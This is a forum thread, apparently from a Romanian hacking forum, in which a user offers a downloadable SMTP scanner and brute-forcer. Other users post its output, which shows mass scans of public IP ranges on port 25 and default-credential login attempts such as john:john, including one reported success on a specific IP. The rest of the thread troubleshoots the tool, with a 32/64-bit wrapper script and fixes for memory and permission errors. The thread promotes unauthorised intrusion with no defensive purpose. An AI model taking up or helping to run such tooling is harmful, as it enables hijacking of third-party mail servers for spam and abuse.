Jump to content
JIHAD

SIMPLE SMTP SCANNER & BRUTE

Recommended Posts

Posted (edited)

root@superstars:~/smtp/final# ./start 5.9
JIHAD FROM BU OWN THIS SHIT!
[-] Searching: 5.9.255.* on port: 25 [Found: 11268] [100.0% Done]
[!] Scanning complete In 155 Seconds. [We got 11343 ips]
[*] Trying: john:john on found ips
[*] OK : john:john 5.9.53.15

Fisiere separate ptr. users and passwords. Se pot specifica editand fisierul start.

GirlShare - Download final-smtp.tgz

se porneste cu ./start ip.ip

Reuploadati-l voi daca considerati ca este necesar.

Astept feedback.

JIHAD!

Edited by JIHAD
Posted
./start32: line 2: 17087 Segmentation fault ./smtpi686 -b $1 -t 1000 -p 25 -user users -pass pass

O sa mearga doar pe ce a compilat el, adica 32/64.

@JIHAD daca vrei sa faci o treaba pentru toata lumea compileaza scannerul si pe 32 si pe 63 si pune executabilele, asa o sa scaneze mult mai multi si nu o sa mai fie probleme.

Posted

Am bagat doar varianta de 32. Ar trebui sa mearga pe majoritatea systemelor de 64.

Cum ziceam, l-am testat pe mai multe sisteme si de 32 si 64 si acum merge teava.

Posted (edited)
Am bagat doar varianta de 32. Ar trebui sa mearga pe majoritatea systemelor de 64.

Cum ziceam, l-am testat pe mai multe sisteme si de 32 si 64 si acum merge teava.

Pe sevrerele de 64 o sa mearga doar daca au librariile pentru 32 instalate nu toate sistemele vin cu aceste librarii default. Crede-ma cel mai bine e sa ai 2 executabile si sa adaugi un script de genu

./go CLASA


if [ `getconf LONG_BIT` = "64" ]
then
./start_64 $1
echo "I'm 64-bit"
else
./start_32 $1
echo "I'm 32-bit"
fi

Poti dezvolta cum vrei.

Edited by Eric
Posted

JIHAD DIN rahatul ?sta BU propriu!

[-] C?utarea: 200.10.255 * pe portul 25 [G?sit: 1397] [100,0% Done].

[!] Scanare complet? în 251 de secunde. [Avem 1401 ips]

1 ip adversari jhon jhon

Am observat c? doar un utilizator ?i parol?

Posted (edited)

root@s18078773:/home/final# ./start 88.102

JIHAD FROM BU OWN THIS SHIT!

[-] Searching: 88.102.255.* on port: 25 [Found: 139] [100.0% Done]

[!] Scanning complete In 236 Seconds. [We got 140 ips]

[*] Trying: john:john on found ips

[*] Trying: john:root on found ips

[*] Trying: john:admin on found ips

[*] Trying: john:administrator on found ips

[!] Couldn't fork!

: Cannot allocate memory

ceea ce am nevoie s? face?i în continuare?

vps:

CPU:

6 vCore

RAM:

6 GB garantiert

HDD:

400 GB

root@s18078773:~# free

total used free shared buffers cached

Mem: 12582912 388660 12194252 0 0 369852

-/+ buffers/cache: 18808 12564104

Swap: 0 0 0

Edited by ghost13
Posted
On 12/13/2014 at 11:06 AM, florinul said:

am incecat de pe mai mute servere si imi da

-bash: ./start: Permission non accordée

am dat chmod +x 777 si tot nimic...

Man Trebuie sa dau orci chmod +x * / chmod 777 * :*

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...